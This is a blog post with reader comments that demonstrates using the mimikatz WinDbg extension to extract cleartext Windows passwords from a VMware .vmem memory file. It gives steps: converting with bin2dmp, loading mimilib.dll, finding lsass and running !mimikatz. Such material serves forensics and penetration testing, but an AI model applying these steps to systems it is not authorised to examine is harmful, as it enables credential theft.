$theTitle=wp_title(" - ", false); if($theTitle != "") { ?>
About Virtualization, VDI, SBC, Application Compatibility and anything else I feel like
Benjamin Delpy the author of the well known mimikatz toolkit has released a very cool extension to WinDbg today.
In summary the extension can extract Windows passwords from memory dumps, hibernation files and Virtual Machine .vmem files (paging, snapshots).
Especially the ability to extract passwords from .vmem files was very interesting. So I decided to to test this out, so let’s see how it works!
First you need to download and install the Debugging Tool for Windows (WinDbg). Then we’ll need MoonSols Windows Memory toolkit (Free edition suffices) and finally you’ll need to download mimikatz.
Extract bin2dmp.exe from Windows Memory Toolkit and use it to convert a .vmem file to a .dmp file:
Now start WinDbg and load the generated dump file via File -> Open Crash Dump. Load the mimilib.dll file that corresponds to the dump file (32 bit lib for x86 dumps and 64 bit lib for x64 dumps).
eg: .load mimilib.dll
Now search for the lsass process (!process 0 0 lsass.exe) and use the returned address:
Finally enter !mimikatz and wait for the magic to happen:
I have just one word, WOW. Great job by Benjamin again!
6 Responses for "Dumping passwords in a VMware .vmem file"
[…] earlier this week the twitter flow went bananas when Remko did a blog about how to extract the password in clear text from a VMware vmem file with the add-on from Benjamin, Mimikatz that extends the […]
thx man very good
Several problems using the procedure on a Windows 10 host. WinDbg for Windows 7 SDk WinDbg install complains about dotNet4.0 as pre-beta and won’t install (no surprise there.)
Turning to the Windows 8.1 SDK standalone debugging tools at https://msdn.microsoft.com/en-us/windows/hardware/hh852365 will install but then throw messages about symbols not found (I have no path configured or symbols loaded, why not…where do they come from) The error when loading my dmp file is *** ERROR: Module load completed but symbols could not be loaded for ntdll.dll
I am unsure what to do next to resolve the symbols issue.
Troubleshooting this, moved to a Win7 Pro VMware client for hosting WinDbg, having the same issue. Now downloading symbold from https://msdn.microsoft.com/en-us/windows/hardware/gg463028
Hope this fixes my issue. Can you comment on symbols support prerequisites (needed or not) in your procedure to support new users of WinDbg?
Thanks for the post Remko, I got it all to work once I added my symbols to WinDbg.
I would like to ask a question on MoonSols Windows Memory Toolkit
I’m trying to convert the vmem file to dmp file in order to run it on WindDbg. However,I had face the problem as below.
C:\Convert2>bin2dmp.exe “564da03e-2732-65fd-1489-1c0d299883a3.vmem” test.dmp
bin2dmp – 1.0.20100405 – (Professional Edition – Single User Licence)
Convert raw memory dump images into Microsoft crash dump files.
Copyright (C) 2007 – 2010, Matthieu Suiche
Copyright (C) 2009 – 2010, MoonSols
User , ()
Initializing memory descriptors… Done.
Looking for kernel variables… Failed.
Cannot open file. Please check if the file is not being used.
C:\Convert2>
Thank you in advance.
Leave a reply